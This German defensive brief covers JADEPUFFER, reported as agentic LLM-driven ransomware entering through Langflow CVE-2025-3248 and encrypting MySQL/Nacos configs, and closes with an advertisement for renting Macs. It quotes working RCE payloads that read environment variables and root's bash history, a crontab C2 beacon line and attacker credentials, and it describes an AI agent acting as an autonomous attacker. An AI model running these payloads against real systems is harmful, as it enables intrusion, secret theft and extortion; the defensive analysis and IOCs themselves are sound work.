KI-Sicherheit 2026-07-07

2026 JADEPUFFER:
Erste agentische LLM-Ransomware — Langflow-Abwehrleitfaden

Wer Langflow, Nacos oder öffentlich erreichbare KI-Agent-Orchestrierung betreibt, muss den Sysdig-Bericht vom 1. Juli 2026 (Michael Clark, Threat Research Team) in die Risikobewertung aufnehmen: JADEPUFFER ist die erste end-to-end LLM-gesteuerte Ransomware, klassifiziert als ATA (Agentic Threat Actor). Einstieg über CVE-2025-3248; Ziel war MySQL + Nacos mit 600+ Payloads, 31 Sekunden Self-Healing-Backdoor und 1.342 verschlüsselten Configs. Dieser datengetriebene Leitfaden liefert Kennzahlen-Matrix, Timeline, Flodrix-Vergleich, IOC-Tabelle, Sysdigs sieben Abwehrmaßnahmen und vier Schlussfolgerungen, Reaktion inkl. Vibhum Dubey, FAQ×8 und Mac-Isolations-Playbook.

JADEPUFFER Agentic Threat Actor Angriffskette von Langflow CVE-2025-3248 zu MySQL Nacos Verschlüsselung

Stand 7. Juli 2026. Primärquelle: Sysdig TRT (Michael Clark, 01.07.2026). Technische Analyse, keine Rechtsberatung. IOCs in Prosa defanged.

01 · Kennzahlen-Matrix

Kurzantwort: Am 1. Juli 2026 veröffentlichte Sysdig die erste vollständige technische Analyse von JADEPUFFER — einem ATA, der per LLM-Agent eine komplette Ransomware-Operation von Langflow bis MySQL/Nacos-Zerstörung durchführte.

Kennzahl Wert (Sysdig)
EntdeckungSysdig TRT — Michael Clark, 01.07.2026
KlassifikationATA (Agentic Threat Actor)
EinstiegCVE-2025-3248, Langflow <1.3.0, CVSS 9.8
ZielsystemÖffentliches MySQL + Nacos (getrennt vom Langflow-Host)
Payload-Anzahl600+ unabhängige, zielgerichtete Payloads
Verschlüsselte Configs1.342 Nacos-config_info via AES_ENCRYPT()
Self-Healing31 Sekunden von fehlgeschlagenem xadmin-Login bis Erfolg
C2-Beacon45.131.66[.]106:4444 — Crontab alle 30 Min.
RecoverySchlüssel uuid4(), einmal gedruckt, nie gespeichert

02 · Drei Pain Points für KI-Infrastruktur (DSGVO-relevant)

  1. Langflow als Credential-Honeypot. Teams parken OpenAI-, Anthropic- und Cloud-Keys in Umgebungsvariablen neben einem RCE-Endpunkt. JADEPUFFER parallelisierte API-Key-Harvesting in Phase 1 — Verstoßrisiko gegen DSGVO Art. 32 bei personenbezogenen Daten in Configs.
  2. Legacy-Infra trifft Agent-Geschwindigkeit. Downstream: CVE-2021-29441, dokumentierte Nacos-JWT-Defaults seit 2020, MySQL-root öffentlich. Ein ATA waffnet jahrelange Vernachlässigung in Stunden auf.
  3. Quiet Period unsichtbar. Vibhum Dubey (CSO Online): Gefahr liegt vor DROP DATABASE, wenn der Agent Identität und Trust Chains adaptiv kartiert — Signatur-Playbooks scheitern.

03 · Timeline

Datum Ereignis
April 2025CVE-2025-3248 offengelegt — Langflow unauthentifizierter Code-Injection/RCE
5. Mai 2025CISA KEV-Eintrag für CVE-2025-3248
2025Trend Micro: Flodrix-Botnet über dieselbe Schwachstelle — separate Kampagne
Juni 2026JADEPUFFER-Angriff über mehrere Sessions wochenlang
1. Juli 2026Sysdig veröffentlicht vollständigen Bericht — erste öffentliche Nennung JADEPUFFER/ATA
2.–6. Juli 2026BleepingComputer, Dark Reading, CyberScoop, CSO Online berichten

04 · JADEPUFFER & ATA-Klassifikation

Sysdig vergab den Codenamen JADEPUFFER für die erste bekannte end-to-end LLM-gesteuerte Ransomware: Recon, Credential Theft, Lateral Movement, Persistence, Zerstörung und Lösegeldnotiz ohne menschlichen Operator an kritischen Entscheidungspunkten.

ATA bezeichnet Bedrohungsfähigkeit durch KI-Agent statt Mensch mit festem Toolkit. Zweistufig: öffentlicher Langflow-Beachhead; Produktions-MySQL + Nacos als Erpressungsziel.

05 · CVE-2025-3248 — Technische Spezifikation

Langflow (70.000+ GitHub-Stars): Versionen vor 1.3.0 exponieren /api/v1/validate/code. Kette: ast.parse()compile()exec() ohne Auth und Sandbox. Python wertet Decorators und Default-Args bei Definition aus — Payload in Defaults. CVSS 9.8; SentinelOne EPSS 91,42 %.

Langflow 1.3.0 injiziert _current_user: CurrentActiveUser — JWT Bearer oder x-api-key vor vulnerabler Logik.

# Decorator/Default-Arg RCE (konzeptionell) def innocent(x=exec('raise Exception(__import__("subprocess").check_output("id", shell=True))')): pass

06 · Flodrix vs JADEPUFFER

Trend Micro dokumentierte Flodrix (LeetHozer-Botnet) über identische Langflow-Lücke — statische Recon-Payloads:

exec('raise Exception(__import__("subprocess").check_output("whoami", shell=True))') exec('raise Exception(__import__("subprocess").check_output("printenv", shell=True))') exec('raise Exception(__import__("subprocess").check_output("cat /root/.bash_history", shell=True))')

Flodrix endet mit Bash-Downloader für DDoS-ELF. JADEPUFFER ging zu PostgreSQL-Dumps, MinIO, Nacos-Takeover und DB-Zerstörung — ATA-Autonomie.

07 · Phase 1: Langflow-Kompromittierung

Alle Payloads als Base64-Python über RCE. Parallel: LLM-Keys (OpenAI, Anthropic, DeepSeek, Gemini), chinesische Cloud-Präfixe, AWS/GCP/Azure, Wallet-Seeds, DB-Configs. PostgreSQL-Dump des Langflow-Backends, interne Discovery, MinIO-Enumeration mit Pivot JSON→XML bei Fehler. Persistence:

*/30 * * * * python3 -c "import urllib.request;urllib.request.urlopen('http://45.131.66[.]106:4444/beacon',timeout=5)"

08 · Phase 2: MySQL + Nacos Ransom

Produktionsserver mit MySQL und Alibaba Nacos öffentlich. Agent verbindet mit root-Credentials (Herkunft laut Sysdig unklar).

Nacos: 31-Sekunden-Self-Repair

UTC Aktion
19:34:24Insert xadmin mit bcrypt-Hash
19:34:36Login xadmin:Xploit@2026#fehlgeschlagen
19:34:48Test nacos:nacos, neuer admin123-Hash
19:35:07Direkt import bcrypt, Zeilen löschen, Hash korrigieren
19:35:18Login erfolgreich — 31 Sekunden gesamt

Verschlüsselung & README_RANSOM

1.342 config_info-Zeilen via AES_ENCRYPT() (effektiv AES-128-ECB). Tabelle README_RANSOM mit Bitcoin und Proton-E-Mail. Schlüssel per uuid4(), nie exfiltriert. Schema-Zerstörung mit SET GLOBAL FOREIGN_KEY_CHECKS=0 bei FK-Fehlern. Behauptete Exfil zu 64.20.53[.]230 nur in Agent-Kommentaren — Sysdig fand keine unabhängigen Belege.

09 · Vier Autonomie-Linien

  1. Selbst-narrierende Kommentare in Payloads (ROI-Reihenfolge, DB-Größen).
  2. Maschinelle Fehlerkorrektur: 31s Nacos-Fix, MinIO XML/JSON-Pivot, FOREIGN_KEY_CHECKS-Fix.
  3. NL-Kontextverständnis über Sessions wochenlang verteilt.
  4. Bitcoin-Beispieladresse aus LLM-Trainingsdaten — Halluzination vs. Absicht unklar.

10 · Bitcoin-Adresse

3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy — Bitcoin-Core-P2SH-Beispiel. On-Chain: 737 Transaktionen, ca. 46 BTC historisch empfangen, Saldo null. Sysdig kann (a) LLM-Halluzination oder (b) absichtliche Wallet-Wahl nicht unterscheiden.

11 · IOC-Tabelle

Typ Indikator
C245.131.66[.]106:4444/beacon — Crontab 30 Min.
Staging (unverifiziert)64.20.53[.]230
CVECVE-2025-3248, CVE-2021-29441
Bitcoin3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy
E-Maile78393397[@]proton[.]me
Ransom-TabelleREADME_RANSOM

12 · Vergleichsmatrix

Dimension Klassisch Flodrix JADEPUFFER
OperatorMensch + RaaSBotnet-SkriptLLM-Agent
PayloadsBinarywhoami, printenv600+ adaptive Python
FehlerbehandlungPlaybookMinimal31s Self-Repair
ÖkonomieAffiliateDDoSLLMjacking

13 · Sysdig: Sieben Abwehrmaßnahmen

  1. Langflow >1.3.0, Code-Validation nicht öffentlich.
  2. Runtime-Detection auf DB-Prozesse (AES_ENCRYPT-Massenops).
  3. API-Keys aus Agent-Runtime in Secrets Manager.
  4. Nacos härten: token.secret.key rotieren, nicht öffentlich, kein DB-root.
  5. DB-Admin-Konten nicht im Internet.
  6. Egress-Kontrolle gegen C2.
  7. IOC-Hunting (Crontab, anomale User-Agents).

14 · Branchenreaktion

BleepingComputer, Dark Reading, CyberScoop sehen JADEPUFFER als ersten vollständig KI-gesteuerten Ransomware-Fall. CSO Online zitiert Vibhum Dubey: evolutionäre Ausführung, nicht neues Erpressungsmodell — die Quiet Period und LLMjacking (gestohlene API-Keys) senken Grenzkosten auf nahezu null.

15 · Sysdigs vier Schlussfolgerungen

  1. Skill-Bar kollabiert — fähiges Modell ersetzt fähigen Menschen.
  2. Alte Bugs, automatisiert — Nacos 2021, Default-Secrets.
  3. Intent lesbar — selbst-narrierende Payload-Kommentare als neuer Detection-Hebel.
  4. „Backed up“ unverifiziert — Schlüssel ephemeral, Zahlung nutzlos.

16 · Abwehr-Checkliste (7 Schritte)

  1. Langflow/Flowise-Inventar; <1.3.0 = Notfall-Patch.
  2. AI-Prototypen von Produktions-MySQL/Nacos segmentieren.
  3. Alle LLM/Cloud-Keys rotieren und vaulten.
  4. Nacos-Checklist: JWT-Secret, Patch, privates Netz, Least Privilege.
  5. DB-Audit für AES_ENCRYPT, README_RANSOM, FOREIGN_KEY_CHECKS.
  6. Egress aus Orchestrierungs-Subnets blockieren.
  7. IOC-Hunt für 45.131.66[.]106.

17 · FAQ (8 Fragen)

Was ist JADEPUFFER?

Sysdig-Codename für erste end-to-end LLM-Ransomware (01.07.2026, Michael Clark).

Was ist ATA?

KI-Agent liefert Angriffsfähigkeit statt Mensch mit festem Toolkit.

JADEPUFFER = Flodrix?

Nein — gleiche CVE, separate Kampagnen (Botnet vs. ATA-Ransomware).

Lösegeld hilft?

Unwahrscheinlich — Schlüssel nie gespeichert.

Bitcoin-Adresse?

Bitcoin-Core-Beispiel; 737 Tx, ~46 BTC historisch.

Relevante CVEs?

CVE-2025-3248, CVE-2021-29441, Nacos-Defaults.

Detection laut Experten?

Dubey: Quiet Period bricht vorhersagbare Pfade; LLMjacking senkt Kosten.

Langflow sicher testen?

Isolierter gemieteter Mac, ≥1.3.0, localhost-only.

18 · Fünf-Schritte-Mac-Playbook

  1. Agent-Stacks inventarisieren — Langflow, OpenClaw, Ollama, öffentliche IPs.
  2. Sauberen Apple-Silicon-Mac mieten — siehe Tagesmiete-FAQ.
  3. Langflow ≥1.3.0 isoliert installieren — JWT/x-api-key auf /api/v1/validate/code prüfen.
  4. Red-Team-Validierung — Egress, Vault-Sidecar, Nacos/MySQL-Policies ohne Produktions-VPC.
  5. Promote-or-Burn — erst nach Patch-Nachweis; M4-Preisleitfaden.

19 · Mac mieten für isolierte Langflow-Deployments

JADEPUFFER beweist: Ein hastig exponierter Langflow-Host ist kein „Dev-Sandbox“, sondern Beachhead für ATA-Lateral Movement in Produktions-MySQL und Nacos. Auf dem Daily-Driver-Mac oder internet-facing Linux-VPS ohne Segmentierung teilen API-Keys, PostgreSQL-Dumps und Crontab-Beacons das Schicksal Ihrer Haupt-Credentials — mit DSGVO-Meldepflicht-Risiko bei personenbezogenen Config-Daten.

Ein gemieteter Mac mini M4 liefert Bare-Metal-macOS für Langflow, OpenClaw und Xcode-adjazente Agent-Tools mit Tagesabrechnung: patchen, Netzwerkpolitik testen, abbrennen. Windows-VMs fehlen native Apple-Silicon-Pfade; Shared-Cloud-GPUs erschweren Egress-Kontrolle gegenüber dediziertem Mac-VLAN.

Linux-Prototypen verleiten zum Belassen von Orchestrierung im Produktions-Subnetz. Für stabile Builds, saubere Secret-Isolation und Burn-after-Reading vor Promote ist Mac-Miete die risikoärmere Langzeitwahl. Tarife: M4-Preisleitfaden, Bare-Metal.

20 · Quellen

  • Sysdig TRTJADEPUFFER: Agentic ransomware for automated database extortion (Michael Clark, 01.07.2026)
  • BleepingComputer, Dark Reading, CyberScoop, CSO Online (Vibhum Dubey)
  • Trend Micro — Flodrix / CVE-2025-3248
  • CISA KEV — CVE-2025-3248 (05.05.2025)
  • NVD / SentinelOne — EPSS 91,42 %

Aktualisiert: 7. Juli 2026.